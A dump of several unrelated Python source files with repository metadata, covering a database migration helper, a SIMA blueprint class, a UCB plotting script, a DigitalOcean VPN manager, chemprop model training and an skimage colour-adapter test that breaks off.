filename = f"{revision_dir}/{script_name}.sql"
query = "\n".join(open(filename))
if len(query) > 0:
op.execute(query)
def upgrade():
process_migration("upgrade")
def downgrade():
process_migration("downgrade")
| true | true |
f7102cf126adafab6de592904ddaa1d404fe782b | 1,011 | py | Python | src/sima/metocean/blueprints/extremevalue.py | SINTEF/simapy | 650b8c2f15503dad98e2bfc0d0788509593822c7 | [
"MIT"
] | null | null | null | src/sima/metocean/blueprints/extremevalue.py | SINTEF/simapy | 650b8c2f15503dad98e2bfc0d0788509593822c7 | [
"MIT"
] | null | null | null | src/sima/metocean/blueprints/extremevalue.py | SINTEF/simapy | 650b8c2f15503dad98e2bfc0d0788509593822c7 | [
"MIT"
] | null | null | null | #
# Generated with ExtremeValueBlueprint
from dmt.blueprint import Blueprint
from dmt.dimension import Dimension
from dmt.attribute import Attribute
from dmt.enum_attribute import EnumAttribute
from dmt.blueprint_attribute import BlueprintAttribute
from sima.sima.blueprints.moao import MOAOBlueprint
class ExtremeValueBlueprint(MOAOBlueprint):
""""""
def __init__(self, name="ExtremeValue", package_path="sima/metocean", description=""):
super().__init__(name,package_path,description)
self.attributes.append(Attribute("name","string","",default=""))
self.attributes.append(Attribute("description","string","",default=""))
self.attributes.append(Attribute("_id","string","",default=""))
self.attributes.append(BlueprintAttribute("scriptableValues","sima/sima/ScriptableValue","",True,Dimension("*")))
self.attributes.append(Attribute("extreme","number","",default=0.0))
self.attributes.append(Attribute("returnPeriod","number","",default=0.0)) | 50.55 | 121 | 0.739862 |
from dmt.blueprint import Blueprint
from dmt.dimension import Dimension
from dmt.attribute import Attribute
from dmt.enum_attribute import EnumAttribute
from dmt.blueprint_attribute import BlueprintAttribute
from sima.sima.blueprints.moao import MOAOBlueprint
class ExtremeValueBlueprint(MOAOBlueprint):
def __init__(self, name="ExtremeValue", package_path="sima/metocean", description=""):
super().__init__(name,package_path,description)
self.attributes.append(Attribute("name","string","",default=""))
self.attributes.append(Attribute("description","string","",default=""))
self.attributes.append(Attribute("_id","string","",default=""))
self.attributes.append(BlueprintAttribute("scriptableValues","sima/sima/ScriptableValue","",True,Dimension("*")))
self.attributes.append(Attribute("extreme","number","",default=0.0))
self.attributes.append(Attribute("returnPeriod","number","",default=0.0)) | true | true |
f7102d6826665c4b3d3b3525445b2c5af3a15fd8 | 2,323 | py | Python | code/visualization/ucb.py | hust-cec-2021/ma2bea | 196f8de33cc4902bd9cb1fdd5400e41f9c275b55 | [
"MIT"
] | null | null | null | code/visualization/ucb.py | hust-cec-2021/ma2bea | 196f8de33cc4902bd9cb1fdd5400e41f9c275b55 | [
"MIT"
] | 1 | 2021-09-08T13:39:10.000Z | 2021-09-09T03:43:06.000Z | code/visualization/ucb.py | hust-cec-2021/ma2bea | 196f8de33cc4902bd9cb1fdd5400e41f9c275b55 | [
"MIT"
] | null | null | null | import os
import argparse
import numpy as np
import matplotlib.pyplot as plt
def get_args():
# create argument parser
parser = argparse.ArgumentParser()
# parameter for problem
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--benchmark_id', type=int, default=0)
parser.add_argument('--rmp', type=float, default=0.3)
# parse args
args = parser.parse_args()
# add other args
return args
ROOT = '../../result'
def load(args):
folder = os.path.join(ROOT, '{}/{}_{}'.format(args.benchmark_id, args.algorithm, args.rmp))
Fitness = []
for name in os.listdir(folder):
path = os.path.join(folder, name)
if 'ucb' in name:
y = np.load(path)
Fitness.append(y)
return np.array(Fitness)
def get_label(args):
return '{}_{}'.format(args.algorithm, args.benchmark_id)
def plot(Fitness, args):
cs = [
['b', 'b', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
['b', 'b', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
['b', 'b', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
['b', 'b', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
['r', 'b', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
['b', 'r', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
['b', 'b', 'r', 'r', 'b', 'b', 'b', 'b', 'b'],
['b', 'b', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
['b', 'b', 'b', 'r', 'b', 'b', 'b', 'b', 'b'],
['b', 'b', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
]
label = get_label(args)
Fitness = Fitness[:, :, args.source]
mean_fitness = np.mean(Fitness, axis=0)
i = 0
for target in range(mean_fitness.shape[1]):
if target != args.source:
plt.plot(mean_fitness[:, target], label='T{}'.format(target+1), color=cs[args.source][i], linewidth=0.3)
plt.ylabel('UCB value')
i += 1
def main():
# get args
args = get_args()
# plot each algorithm
args.algorithm = 'MTO'
Fitness = load(args)
for source in range(10):
args.source = source
plot(Fitness, args)
plt.legend()
plt.ylim((0, 2))
plt.savefig('plot/ucb/{}.eps'.format(source + 1), dpi=300)
plt.savefig('plot/ucb/{}.png'.format(source + 1), dpi=300)
plt.clf()
plt.cla()
if __name__ == '__main__':
main()
| 29.782051 | 116 | 0.494189 | import os
import argparse
import numpy as np
import matplotlib.pyplot as plt
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--benchmark_id', type=int, default=0)
parser.add_argument('--rmp', type=float, default=0.3)
args = parser.parse_args()
return args
ROOT = '../../result'
def load(args):
folder = os.path.join(ROOT, '{}/{}_{}'.format(args.benchmark_id, args.algorithm, args.rmp))
Fitness = []
for name in os.listdir(folder):
path = os.path.join(folder, name)
if 'ucb' in name:
y = np.load(path)
Fitness.append(y)
return np.array(Fitness)
def get_label(args):
return '{}_{}'.format(args.algorithm, args.benchmark_id)
def plot(Fitness, args):
cs = [
['b', 'b', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
['b', 'b', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
['b', 'b', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
['b', 'b', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
['r', 'b', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
['b', 'r', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
['b', 'b', 'r', 'r', 'b', 'b', 'b', 'b', 'b'],
['b', 'b', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
['b', 'b', 'b', 'r', 'b', 'b', 'b', 'b', 'b'],
['b', 'b', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
]
label = get_label(args)
Fitness = Fitness[:, :, args.source]
mean_fitness = np.mean(Fitness, axis=0)
i = 0
for target in range(mean_fitness.shape[1]):
if target != args.source:
plt.plot(mean_fitness[:, target], label='T{}'.format(target+1), color=cs[args.source][i], linewidth=0.3)
plt.ylabel('UCB value')
i += 1
def main():
args = get_args()
args.algorithm = 'MTO'
Fitness = load(args)
for source in range(10):
args.source = source
plot(Fitness, args)
plt.legend()
plt.ylim((0, 2))
plt.savefig('plot/ucb/{}.eps'.format(source + 1), dpi=300)
plt.savefig('plot/ucb/{}.png'.format(source + 1), dpi=300)
plt.clf()
plt.cla()
if __name__ == '__main__':
main()
| true | true |
f7102d81b029f475ab955aea8189e37c558f7827 | 2,229 | py | Python | dovpn.py | dhminch/dovpn | bcd35679d33608f243ceef23b8581c56cfe59dd8 | [
"MIT"
] | null | null | null | dovpn.py | dhminch/dovpn | bcd35679d33608f243ceef23b8581c56cfe59dd8 | [
"MIT"
] | null | null | null | dovpn.py | dhminch/dovpn | bcd35679d33608f243ceef23b8581c56cfe59dd8 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
"""Main function for the DOVPN project."""
import argparse
import logging
import os
import yaml
import vpnorchestrator
def main():
"""Main function that sets up script to run.
Handles arguments, logging, and configuration before passing of control
to the orchestrator object."""
parser = argparse.ArgumentParser(description='Manage a DigitalOcean VPN.')
parser.add_argument('-c', '--config', default="config.yaml",
help='configuration file location')
parser.add_argument('-r', '--remove', action='store_true',
help='remove all related DigitalOcean droplets and keys, and quit')
parser.add_argument('-v', '--verbose', action='store_true',
help="enable verbose output")
parser.add_argument('-d', '--debug', action='store_true',
help="enable verbose output with HTTP requests (implies -v)")
args = parser.parse_args()
log_format = "%(asctime)s %(levelname)8s: %(message)s"
if args.debug:
import http.client as http_client
http_client.HTTPConnection.debuglevel = 1
logging.basicConfig(format=log_format, level=logging.DEBUG)
elif args.verbose:
logging.basicConfig(format=log_format, level=logging.DEBUG)
else:
logging.basicConfig(format=log_format, level=logging.INFO)
if os.geteuid() != 0:
logging.critical("You are not root!")
exit(1)
if not os.path.isfile(args.config):
logging.critical("Config file {} does not exist.".format(args.config))
exit(1)
logging.info("Loading configuration file {}".format(args.config))
with open(args.config, "r") as config_file:
config_yaml = yaml.load(config_file, Loader=yaml.FullLoader)
if args.remove:
logging.info("Removing all DigitalOcean droplets and keys")
orch = vpnorchestrator.VpnOrchestrator(config_yaml)
orch.clean()
exit(0)
try:
orch = vpnorchestrator.VpnOrchestrator(config_yaml)
orch.start()
orch.wait()
orch.teardown()
except Exception as ex:
orch.teardown()
raise ex
if __name__ == "__main__":
main() | 33.268657 | 91 | 0.645581 |
import argparse
import logging
import os
import yaml
import vpnorchestrator
def main():
parser = argparse.ArgumentParser(description='Manage a DigitalOcean VPN.')
parser.add_argument('-c', '--config', default="config.yaml",
help='configuration file location')
parser.add_argument('-r', '--remove', action='store_true',
help='remove all related DigitalOcean droplets and keys, and quit')
parser.add_argument('-v', '--verbose', action='store_true',
help="enable verbose output")
parser.add_argument('-d', '--debug', action='store_true',
help="enable verbose output with HTTP requests (implies -v)")
args = parser.parse_args()
log_format = "%(asctime)s %(levelname)8s: %(message)s"
if args.debug:
import http.client as http_client
http_client.HTTPConnection.debuglevel = 1
logging.basicConfig(format=log_format, level=logging.DEBUG)
elif args.verbose:
logging.basicConfig(format=log_format, level=logging.DEBUG)
else:
logging.basicConfig(format=log_format, level=logging.INFO)
if os.geteuid() != 0:
logging.critical("You are not root!")
exit(1)
if not os.path.isfile(args.config):
logging.critical("Config file {} does not exist.".format(args.config))
exit(1)
logging.info("Loading configuration file {}".format(args.config))
with open(args.config, "r") as config_file:
config_yaml = yaml.load(config_file, Loader=yaml.FullLoader)
if args.remove:
logging.info("Removing all DigitalOcean droplets and keys")
orch = vpnorchestrator.VpnOrchestrator(config_yaml)
orch.clean()
exit(0)
try:
orch = vpnorchestrator.VpnOrchestrator(config_yaml)
orch.start()
orch.wait()
orch.teardown()
except Exception as ex:
orch.teardown()
raise ex
if __name__ == "__main__":
main() | true | true |
f7102ec5b68677844155001f87b3bfc7105cb084 | 12,274 | py | Python | chemprop/train/run_training.py | allisontam/chemprop | 87ac151c68d8a200d564b064103c4f514e29f6bd | [
"MIT"
] | null | null | null | chemprop/train/run_training.py | allisontam/chemprop | 87ac151c68d8a200d564b064103c4f514e29f6bd | [
"MIT"
] | null | null | null | chemprop/train/run_training.py | allisontam/chemprop | 87ac151c68d8a200d564b064103c4f514e29f6bd | [
"MIT"
] | 1 | 2020-04-02T13:10:34.000Z | 2020-04-02T13:10:34.000Z | from argparse import Namespace
import csv
from logging import Logger
import os
from pprint import pformat
from typing import List
import numpy as np
from tensorboardX import SummaryWriter
import torch
from tqdm import trange
import pickle
from torch.optim.lr_scheduler import ExponentialLR
from .evaluate import evaluate, evaluate_predictions
from .predict import predict, save_predictions
from .train import train
from chemprop.data import StandardScaler
from chemprop.data.utils import flip_data, get_class_sizes, get_data, get_task_names, split_data, split_loocv
from chemprop.models import build_model
from chemprop.nn_utils import param_count
from chemprop.utils import build_optimizer, build_lr_scheduler, get_loss_func, get_metric_func, load_checkpoint,\
makedirs, save_checkpoint
def run_training(args: Namespace, logger: Logger = None) -> List[float]:
"""
Trains a model and returns test scores on the model checkpoint with the highest validation score.
:param args: Arguments.
:param logger: Logger.
:return: A list of ensemble scores for each task.
"""
if logger is not None:
debug, info = logger.debug, logger.info
else:
debug = info = print
# Set GPU
if args.gpu is not None:
torch.cuda.set_device(args.gpu)
# Print args
debug(pformat(vars(args)))
# Get data
debug('Loading data')
args.task_names = get_task_names(args.data_path, args.data_format)
data = get_data(path=args.data_path, args=args, logger=logger)
args.num_tasks = data.num_tasks()
args.features_size = data.features_size()
debug(f'Number of tasks = {args.num_tasks}')
# Split data
debug(f'Splitting data with seed {args.seed}')
if args.separate_test_path:
test_data = get_data(path=args.separate_test_path, args=args, features_path=args.separate_test_features_path, logger=logger)
if args.separate_val_path:
val_data = get_data(path=args.separate_val_path, args=args, features_path=args.separate_val_features_path, logger=logger)
if args.separate_val_path and args.separate_test_path:
train_data = data
elif args.separate_val_path:
train_data, _, test_data = split_data(data=data, split_type=args.split_type, sizes=(0.8, 0.0, 0.2), seed=args.seed, args=args, logger=logger)
elif args.separate_test_path:
train_data, val_data, _ = split_data(data=data, split_type=args.split_type, sizes=(0.8, 0.2, 0.0), seed=args.seed, args=args, logger=logger)
elif args.split_type == 'loocv':
train_data, val_data, test_data = split_loocv(data=data, args=args, logger=logger)
else:
train_data, val_data, test_data = split_data(data=data, split_type=args.split_type, sizes=args.split_sizes, seed=args.seed, args=args, logger=logger)
if args.dataset_type == 'classification':
class_sizes = get_class_sizes(test_data)
debug('Class sizes in test set')
for i, task_class_sizes in enumerate(class_sizes):
debug(f'{args.task_names[i]} '
f'{", ".join(f"{cls}: {size * 100:.2f}%" for cls, size in enumerate(task_class_sizes))}')
if not args.train_all and task_class_sizes == 0: # TODO: only works for just 1 property prediction task
debug('Moved to next epoch due to homogenous targets in test set.')
return [float('nan')]
if args.save_smiles_splits:
with open(args.data_path, 'r') as f:
reader = csv.reader(f)
header = next(reader)
lines_by_smiles = {}
indices_by_smiles = {}
for i, line in enumerate(reader):
smiles = (line[0], line[1])
lines_by_smiles[smiles] = line
indices_by_smiles[smiles] = i
all_split_indices = []
for dataset, name in [(train_data, 'train'), (val_data, 'val'), (test_data, 'test')]:
with open(os.path.join(args.save_dir, name + '_smiles.csv'), 'w') as f:
writer = csv.writer(f)
writer.writerow(['smiles'])
for smiles in dataset.smiles():
writer.writerow([smiles])
with open(os.path.join(args.save_dir, name + '_full.csv'), 'w') as f:
writer = csv.writer(f)
writer.writerow(header)
for smiles in dataset.smiles():
writer.writerow(lines_by_smiles[smiles])
split_indices = []
for smiles in dataset.smiles():
split_indices.append(indices_by_smiles[smiles])
split_indices = sorted(split_indices)
all_split_indices.append(split_indices)
with open(os.path.join(args.save_dir, 'split_indices.pckl'), 'wb') as f:
pickle.dump(all_split_indices, f)
if args.symmetric:
train_data = flip_data(train_data)
if args.features_scaling:
drug_scaler, cmpd_scaler = train_data.normalize_features(replace_nan_token=0)
val_data.normalize_features(drug_scaler, cmpd_scaler)
test_data.normalize_features(drug_scaler, cmpd_scaler)
else:
drug_scaler, cmpd_scaler = None, None
args.train_data_size = len(train_data)
debug(f'Total size = {len(data):,} | '
f'train size = {len(train_data):,} | val size = {len(val_data):,} | test size = {len(test_data):,}')
# Initialize scaler and scale training targets by subtracting mean and dividing standard deviation (regression only)
if args.dataset_type == 'regression':
debug('Fitting scaler')
train_smiles, train_targets = train_data.smiles(), train_data.targets()
scaler = StandardScaler().fit(train_targets)
scaled_targets = scaler.transform(train_targets).tolist()
train_data.set_targets(scaled_targets)
else:
scaler = None
# Get loss and metric functions
loss_func = get_loss_func(args)
metric_func = get_metric_func(metric=args.metric)
# Set up test set evaluation
test_smiles, test_targets = test_data.smiles(), test_data.targets()
if args.dataset_type == 'multiclass':
sum_test_preds = np.zeros((len(test_smiles), args.num_tasks, args.multiclass_num_classes))
else:
sum_test_preds = np.zeros((len(test_smiles), args.num_tasks))
# Train ensemble of models
for model_idx in range(args.ensemble_size):
# Tensorboard writer
save_dir = os.path.join(args.save_dir, f'model_{model_idx}')
makedirs(save_dir)
try:
writer = SummaryWriter(log_dir=save_dir)
except:
writer = SummaryWriter(logdir=save_dir)
# Load/build model
if args.checkpoint_paths is not None:
debug(f'Loading model {model_idx} from {args.checkpoint_paths[model_idx]}')
model = load_checkpoint(args.checkpoint_paths[model_idx], current_args=args, logger=logger)
else:
debug(f'Building model {model_idx}')
model = build_model(args)
debug(model)
debug(f'Number of parameters = {param_count(model):,}')
if args.cuda:
debug('Moving model to cuda')
model = model.cuda()
# Ensure that model is saved in correct location for evaluation if 0 epochs
save_checkpoint(os.path.join(save_dir, 'model.pt'), model, scaler, drug_scaler, cmpd_scaler, args)
# Optimizers
optimizer = build_optimizer(model, args)
# Learning rate schedulers
scheduler = build_lr_scheduler(optimizer, args)
# Run training
best_score = float('inf') if args.minimize_score else -float('inf')
best_epoch, n_iter = 0, 0
for epoch in trange(args.epochs):
debug(f'Epoch {epoch}')
n_iter = train(
model=model,
data=train_data,
loss_func=loss_func,
optimizer=optimizer,
scheduler=scheduler,
args=args,
n_iter=n_iter,
logger=logger,
writer=writer
)
if isinstance(scheduler, ExponentialLR):
scheduler.step()
val_scores, val_loss = evaluate(
model=model,
data=val_data,
loss_func=loss_func,
num_tasks=args.num_tasks,
metric_func=metric_func,
batch_size=args.batch_size,
dataset_type=args.dataset_type,
scaler=scaler,
logger=logger
)
# Average validation score
avg_val_score = np.nanmean(val_scores)
debug(f'Validation {args.metric} = {avg_val_score:.6f}')
writer.add_scalar(f'validation_{args.metric}', avg_val_score, n_iter)
debug(f'Validation loss = {val_loss:.6f}')
writer.add_scalar(f'validation_loss', val_loss, n_iter)
if args.show_individual_scores:
# Individual validation scores
for task_name, val_score in zip(args.task_names, val_scores):
debug(f'Validation {task_name} {args.metric} = {val_score:.6f}')
writer.add_scalar(f'validation_{task_name}_{args.metric}', val_score, n_iter)
# Save model checkpoint if improved validation score
if args.minimize_score and avg_val_score < best_score or \
not args.minimize_score and avg_val_score > best_score:
best_score, best_epoch = avg_val_score, epoch
save_checkpoint(os.path.join(save_dir, 'model.pt'), model, scaler, drug_scaler, cmpd_scaler, args)
# Evaluate on test set using model with best validation score
info(f'Model {model_idx} best validation {args.metric} = {best_score:.6f} on epoch {best_epoch}')
model = load_checkpoint(os.path.join(save_dir, 'model.pt'), cuda=args.cuda, logger=logger)
test_preds = predict(
model=model,
data=test_data,
batch_size=args.batch_size,
scaler=scaler
)
if args.save_preds:
val_preds = predict(model=model, data=val_data, batch_size=args.batch_size, scaler=scaler)
train_preds = predict(model=model, data=train_data, batch_size=args.batch_size, scaler=scaler)
save_predictions(save_dir, train_data, val_data, test_data, \
train_preds, val_preds, test_preds, args.task_names, scaler)
test_scores = evaluate_predictions(
preds=test_preds,
targets=test_targets,
num_tasks=args.num_tasks,
metric_func=metric_func,
dataset_type=args.dataset_type,
logger=logger
)
if len(test_preds) != 0:
sum_test_preds += np.array(test_preds)
# Average test score
avg_test_score = np.nanmean(test_scores)
info(f'Model {model_idx} test {args.metric} = {avg_test_score:.6f}')
writer.add_scalar(f'test_{args.metric}', avg_test_score, 0)
if args.show_individual_scores:
# Individual test scores
for task_name, test_score in zip(args.task_names, test_scores):
info(f'Model {model_idx} test {task_name} {args.metric} = {test_score:.6f}')
writer.add_scalar(f'test_{task_name}_{args.metric}', test_score, n_iter)
# Evaluate ensemble on test set
avg_test_preds = (sum_test_preds / args.ensemble_size).tolist()
ensemble_scores = evaluate_predictions(
preds=avg_test_preds,
targets=test_targets,
num_tasks=args.num_tasks,
metric_func=metric_func,
dataset_type=args.dataset_type,
logger=logger
)
# Average ensemble score
avg_ensemble_test_score = np.nanmean(ensemble_scores)
info(f'Ensemble test {args.metric} = {avg_ensemble_test_score:.6f}')
writer.add_scalar(f'ensemble_test_{args.metric}', avg_ensemble_test_score, 0)
# Individual ensemble scores
if args.show_individual_scores:
for task_name, ensemble_score in zip(args.task_names, ensemble_scores):
info(f'Ensemble test {task_name} {args.metric} = {ensemble_score:.6f}')
return ensemble_scores
| 41.60678 | 157 | 0.644533 | from argparse import Namespace
import csv
from logging import Logger
import os
from pprint import pformat
from typing import List
import numpy as np
from tensorboardX import SummaryWriter
import torch
from tqdm import trange
import pickle
from torch.optim.lr_scheduler import ExponentialLR
from .evaluate import evaluate, evaluate_predictions
from .predict import predict, save_predictions
from .train import train
from chemprop.data import StandardScaler
from chemprop.data.utils import flip_data, get_class_sizes, get_data, get_task_names, split_data, split_loocv
from chemprop.models import build_model
from chemprop.nn_utils import param_count
from chemprop.utils import build_optimizer, build_lr_scheduler, get_loss_func, get_metric_func, load_checkpoint,\
makedirs, save_checkpoint
def run_training(args: Namespace, logger: Logger = None) -> List[float]:
if logger is not None:
debug, info = logger.debug, logger.info
else:
debug = info = print
if args.gpu is not None:
torch.cuda.set_device(args.gpu)
debug(pformat(vars(args)))
debug('Loading data')
args.task_names = get_task_names(args.data_path, args.data_format)
data = get_data(path=args.data_path, args=args, logger=logger)
args.num_tasks = data.num_tasks()
args.features_size = data.features_size()
debug(f'Number of tasks = {args.num_tasks}')
debug(f'Splitting data with seed {args.seed}')
if args.separate_test_path:
test_data = get_data(path=args.separate_test_path, args=args, features_path=args.separate_test_features_path, logger=logger)
if args.separate_val_path:
val_data = get_data(path=args.separate_val_path, args=args, features_path=args.separate_val_features_path, logger=logger)
if args.separate_val_path and args.separate_test_path:
train_data = data
elif args.separate_val_path:
train_data, _, test_data = split_data(data=data, split_type=args.split_type, sizes=(0.8, 0.0, 0.2), seed=args.seed, args=args, logger=logger)
elif args.separate_test_path:
train_data, val_data, _ = split_data(data=data, split_type=args.split_type, sizes=(0.8, 0.2, 0.0), seed=args.seed, args=args, logger=logger)
elif args.split_type == 'loocv':
train_data, val_data, test_data = split_loocv(data=data, args=args, logger=logger)
else:
train_data, val_data, test_data = split_data(data=data, split_type=args.split_type, sizes=args.split_sizes, seed=args.seed, args=args, logger=logger)
if args.dataset_type == 'classification':
class_sizes = get_class_sizes(test_data)
debug('Class sizes in test set')
for i, task_class_sizes in enumerate(class_sizes):
debug(f'{args.task_names[i]} '
f'{", ".join(f"{cls}: {size * 100:.2f}%" for cls, size in enumerate(task_class_sizes))}')
if not args.train_all and task_class_sizes == 0:
debug('Moved to next epoch due to homogenous targets in test set.')
return [float('nan')]
if args.save_smiles_splits:
with open(args.data_path, 'r') as f:
reader = csv.reader(f)
header = next(reader)
lines_by_smiles = {}
indices_by_smiles = {}
for i, line in enumerate(reader):
smiles = (line[0], line[1])
lines_by_smiles[smiles] = line
indices_by_smiles[smiles] = i
all_split_indices = []
for dataset, name in [(train_data, 'train'), (val_data, 'val'), (test_data, 'test')]:
with open(os.path.join(args.save_dir, name + '_smiles.csv'), 'w') as f:
writer = csv.writer(f)
writer.writerow(['smiles'])
for smiles in dataset.smiles():
writer.writerow([smiles])
with open(os.path.join(args.save_dir, name + '_full.csv'), 'w') as f:
writer = csv.writer(f)
writer.writerow(header)
for smiles in dataset.smiles():
writer.writerow(lines_by_smiles[smiles])
split_indices = []
for smiles in dataset.smiles():
split_indices.append(indices_by_smiles[smiles])
split_indices = sorted(split_indices)
all_split_indices.append(split_indices)
with open(os.path.join(args.save_dir, 'split_indices.pckl'), 'wb') as f:
pickle.dump(all_split_indices, f)
if args.symmetric:
train_data = flip_data(train_data)
if args.features_scaling:
drug_scaler, cmpd_scaler = train_data.normalize_features(replace_nan_token=0)
val_data.normalize_features(drug_scaler, cmpd_scaler)
test_data.normalize_features(drug_scaler, cmpd_scaler)
else:
drug_scaler, cmpd_scaler = None, None
args.train_data_size = len(train_data)
debug(f'Total size = {len(data):,} | '
f'train size = {len(train_data):,} | val size = {len(val_data):,} | test size = {len(test_data):,}')
if args.dataset_type == 'regression':
debug('Fitting scaler')
train_smiles, train_targets = train_data.smiles(), train_data.targets()
scaler = StandardScaler().fit(train_targets)
scaled_targets = scaler.transform(train_targets).tolist()
train_data.set_targets(scaled_targets)
else:
scaler = None
loss_func = get_loss_func(args)
metric_func = get_metric_func(metric=args.metric)
test_smiles, test_targets = test_data.smiles(), test_data.targets()
if args.dataset_type == 'multiclass':
sum_test_preds = np.zeros((len(test_smiles), args.num_tasks, args.multiclass_num_classes))
else:
sum_test_preds = np.zeros((len(test_smiles), args.num_tasks))
for model_idx in range(args.ensemble_size):
save_dir = os.path.join(args.save_dir, f'model_{model_idx}')
makedirs(save_dir)
try:
writer = SummaryWriter(log_dir=save_dir)
except:
writer = SummaryWriter(logdir=save_dir)
if args.checkpoint_paths is not None:
debug(f'Loading model {model_idx} from {args.checkpoint_paths[model_idx]}')
model = load_checkpoint(args.checkpoint_paths[model_idx], current_args=args, logger=logger)
else:
debug(f'Building model {model_idx}')
model = build_model(args)
debug(model)
debug(f'Number of parameters = {param_count(model):,}')
if args.cuda:
debug('Moving model to cuda')
model = model.cuda()
save_checkpoint(os.path.join(save_dir, 'model.pt'), model, scaler, drug_scaler, cmpd_scaler, args)
optimizer = build_optimizer(model, args)
scheduler = build_lr_scheduler(optimizer, args)
best_score = float('inf') if args.minimize_score else -float('inf')
best_epoch, n_iter = 0, 0
for epoch in trange(args.epochs):
debug(f'Epoch {epoch}')
n_iter = train(
model=model,
data=train_data,
loss_func=loss_func,
optimizer=optimizer,
scheduler=scheduler,
args=args,
n_iter=n_iter,
logger=logger,
writer=writer
)
if isinstance(scheduler, ExponentialLR):
scheduler.step()
val_scores, val_loss = evaluate(
model=model,
data=val_data,
loss_func=loss_func,
num_tasks=args.num_tasks,
metric_func=metric_func,
batch_size=args.batch_size,
dataset_type=args.dataset_type,
scaler=scaler,
logger=logger
)
avg_val_score = np.nanmean(val_scores)
debug(f'Validation {args.metric} = {avg_val_score:.6f}')
writer.add_scalar(f'validation_{args.metric}', avg_val_score, n_iter)
debug(f'Validation loss = {val_loss:.6f}')
writer.add_scalar(f'validation_loss', val_loss, n_iter)
if args.show_individual_scores:
for task_name, val_score in zip(args.task_names, val_scores):
debug(f'Validation {task_name} {args.metric} = {val_score:.6f}')
writer.add_scalar(f'validation_{task_name}_{args.metric}', val_score, n_iter)
if args.minimize_score and avg_val_score < best_score or \
not args.minimize_score and avg_val_score > best_score:
best_score, best_epoch = avg_val_score, epoch
save_checkpoint(os.path.join(save_dir, 'model.pt'), model, scaler, drug_scaler, cmpd_scaler, args)
info(f'Model {model_idx} best validation {args.metric} = {best_score:.6f} on epoch {best_epoch}')
model = load_checkpoint(os.path.join(save_dir, 'model.pt'), cuda=args.cuda, logger=logger)
test_preds = predict(
model=model,
data=test_data,
batch_size=args.batch_size,
scaler=scaler
)
if args.save_preds:
val_preds = predict(model=model, data=val_data, batch_size=args.batch_size, scaler=scaler)
train_preds = predict(model=model, data=train_data, batch_size=args.batch_size, scaler=scaler)
save_predictions(save_dir, train_data, val_data, test_data, \
train_preds, val_preds, test_preds, args.task_names, scaler)
test_scores = evaluate_predictions(
preds=test_preds,
targets=test_targets,
num_tasks=args.num_tasks,
metric_func=metric_func,
dataset_type=args.dataset_type,
logger=logger
)
if len(test_preds) != 0:
sum_test_preds += np.array(test_preds)
avg_test_score = np.nanmean(test_scores)
info(f'Model {model_idx} test {args.metric} = {avg_test_score:.6f}')
writer.add_scalar(f'test_{args.metric}', avg_test_score, 0)
if args.show_individual_scores:
for task_name, test_score in zip(args.task_names, test_scores):
info(f'Model {model_idx} test {task_name} {args.metric} = {test_score:.6f}')
writer.add_scalar(f'test_{task_name}_{args.metric}', test_score, n_iter)
avg_test_preds = (sum_test_preds / args.ensemble_size).tolist()
ensemble_scores = evaluate_predictions(
preds=avg_test_preds,
targets=test_targets,
num_tasks=args.num_tasks,
metric_func=metric_func,
dataset_type=args.dataset_type,
logger=logger
)
avg_ensemble_test_score = np.nanmean(ensemble_scores)
info(f'Ensemble test {args.metric} = {avg_ensemble_test_score:.6f}')
writer.add_scalar(f'ensemble_test_{args.metric}', avg_ensemble_test_score, 0)
if args.show_individual_scores:
for task_name, ensemble_score in zip(args.task_names, ensemble_scores):
info(f'Ensemble test {task_name} {args.metric} = {ensemble_score:.6f}')
return ensemble_scores
| true | true |
f7102ed9e03cc66c9c81ee370ec0eb1a82b28ef4 | 2,753 | py | Python | ProgettoLube/WebInspector/venv/Lib/site-packages/skimage/color/tests/test_adapt_rgb.py | Lube-Project/ProgettoLube | cbf33971e2c2e865783ec1a2302625539186a338 | [
"MIT"
] | 2 | 2022-03-19T09:45:18.000Z | 2022-03-19T15:26:24.000Z | ProgettoLube/WebInspector/venv/Lib/site-packages/skimage/color/tests/test_adapt_rgb.py | Lube-Project/ProgettoLube | cbf33971e2c2e865783ec1a2302625539186a338 | [
"MIT"
] | 7 | 2021-06-08T21:46:24.000Z | 2022-03-12T00:35:31.000Z | site-packages/skimage/color/tests/test_adapt_rgb.py | Wristlebane/Pyto | 901ac307b68486d8289105c159ca702318bea5b0 | [
"MIT"
] | 1 | 2020-06-29T15:18:22.000Z | 2020-06-29T15:18:22.000Z | from functools import partial
import numpy as np
from skimage import img_as_float, img_as_uint
from skimage import color, data, filters
from skimage.color.adapt_rgb import adapt_rgb, each_channel, hsv_value
# Down-sample image for quicker testing.
COLOR_IMAGE = data.astronaut()[::5, ::6]
GRAY_IMAGE = data.camera()[::5, ::5]
SIGMA = 3
smooth = partial(filters.gaussian, sigma=SIGMA)
assert_allclose = partial(np.testing.assert_allclose, atol=1e-8)
@adapt_rgb(each_channel)
def edges_each(image):
return filters.sobel(image)
@adapt_rgb(each_channel)
def smooth_each(image, sigma):
return filters.gaussian(image, sigma)
@adapt_rgb(each_channel)
def mask_each(image, mask):
result = image.copy()
result[mask] = 0
return result
@adapt_rgb(hsv_value)
def edges_hsv(image):
return filters.sobel(image)
@adapt_rgb(hsv_value)
def smooth_hsv(image, sigma):
return filters.gaussian(image, sigma)
@adapt_rgb(hsv_value)
def edges_hsv_uint(image):
return img_as_uint(filters.sobel(image))
def test_gray_scale_image():
# We don't need to test both `hsv_value` and `each_channel` since
# `adapt_rgb` is handling gray-scale inputs.
